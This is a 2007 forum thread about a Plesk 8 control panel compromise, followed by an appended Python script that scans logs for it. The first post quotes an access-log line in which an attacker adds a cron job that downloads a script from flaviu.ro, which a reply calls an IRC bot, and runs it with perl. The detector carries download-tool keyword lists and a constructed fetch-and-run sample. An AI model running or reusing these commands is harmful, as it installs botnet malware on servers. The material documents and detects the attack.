
Security Violation plesk 8.0.X

Discussion in 'Plesk for Linux - 8.x and Older' started by stewartrose, May 26, 2007.

  1. stewartrose

    stewartrose Guest

    Just for interest..

    Hacked through Plesk control panel.

    httpsd_access_log:xxx.xxx.xxx.xxx - - [26/May/2007:00:00:24 +0100] "POST /sysuser/crontab_edit.php?cmd=update&cte_enabled=true&cte_minute=*&cte_hour=*&cte_dom=*&cte_month=*&cte_dow=*&cte_cmd=cd%20/usr/local/lib/;killall%20-9%20perl;rm%20-rf%20flaviu;curl%20-O%20http://flaviu.ro/flaviu;wget%20http://flaviu.ro/flaviu;lynx%20-source%20http://flaviu.ro/flaviu;fetch%20www.flaviu.ro/flaviu;GET%20http://flaviu.ro/flaviu;perl%20flaviu;rm%20-rf%20x* HTTP/1.1" 200 366

    All the best from Alan
     
  2. atomicturtle

    atomicturtle Golden Pleskian

    That's a risk you take whenever you allow a user to modify cron. They can execute any command on the system that they want.

    What happened there is that someone with a valid logon set up a cron job to download that script (an irc zombie bot) and run it.
     
  3. stewartrose

    stewartrose Guest

    Hi atomicturtle,

    Not quite, no one has access to the CP but me, and my passwords are very strong. The code given uploads data through the exploit.

    all the best from Alan
     
  4. atomicturtle

    atomicturtle Golden Pleskian

    Then it's possible your desktop has been compromised. You cannot access the cron settings without being logged into the CP.
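
Added example, not part of the thread: a log check that finds `crontab_edit.php` update requests like the one quoted in the first post and reports the decoded `cte_cmd` when it both downloads a file and runs an interpreter. The request path and the `cmd`/`cte_*` parameter names are taken from that log line; the sample lines, addresses and host names are constructed, and the keyword lists are assumptions to tune per site.

```python
import re
from urllib.parse import unquote_plus

# Common Log Format, optionally prefixed by a grep-style "file:" as in the post.
LOG_RE = re.compile(
    r'^(?:\S*access_log:)?(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)
FETCH = re.compile(r'\b(?:curl|wget|lynx|fetch|GET)\b')   # assumed keyword list
RUN = re.compile(r'\b(?:perl|sh|bash|python|php)\b')      # assumed keyword list
SCHEDULE = ("cte_minute", "cte_hour", "cte_dom", "cte_month", "cte_dow")

def inspect_line(line):
    """Return a finding for a crontab_edit.php update request, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    # Split on '&' only: the cron command itself contains ';' separators.
    pairs = (p.partition("=") for p in query.split("&") if p)
    params = {unquote_plus(k): unquote_plus(v) for k, _, v in pairs}
    if not path.endswith("/sysuser/crontab_edit.php"):
        return None
    if params.get("cmd") != "update" or "cte_cmd" not in params:
        return None
    cmd, reasons = params["cte_cmd"], []
    if FETCH.search(cmd):
        reasons.append("download")
    if RUN.search(cmd):
        reasons.append("execute")
    if all(params.get(k) == "*" for k in SCHEDULE):
        reasons.append("every-minute")
    return {"host": m["host"], "time": m["time"], "status": int(m["status"]),
            "command": cmd, "reasons": reasons}

def flagged(lines):
    """Findings whose command both fetches a remote file and runs it."""
    hits = (inspect_line(l) for l in lines)
    return [h for h in hits if h and {"download", "execute"} <= set(h["reasons"])]

SAMPLE_LOG = [  # constructed lines, not taken from a real server
    'httpsd_access_log:192.0.2.10 - - [26/May/2007:00:00:24 +0100] "POST /sysuser/crontab_edit.php?cmd=update&cte_enabled=true&cte_minute=*&cte_hour=*&cte_dom=*&cte_month=*&cte_dow=*&cte_cmd=cd%20/tmp;wget%20http://files.example.invalid/bot;perl%20bot HTTP/1.1" 200 366',
    '198.51.100.7 - - [26/May/2007:09:12:01 +0100] "POST /sysuser/crontab_edit.php?cmd=update&cte_enabled=true&cte_minute=0&cte_hour=3&cte_dom=*&cte_month=*&cte_dow=*&cte_cmd=/usr/bin/php%20/var/www/vhosts/site.example.invalid/cron.php HTTP/1.1" 200 366',
    '198.51.100.7 - - [26/May/2007:09:13:44 +0100] "GET /login.php HTTP/1.1" 200 1204',
]

if __name__ == "__main__":
    for hit in flagged(SAMPLE_LOG):
        print(hit["time"], hit["host"], hit["reasons"], hit["command"])
```

The source address and timestamp of each hit can then be matched against the control panel's login records to see which session submitted the change.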
     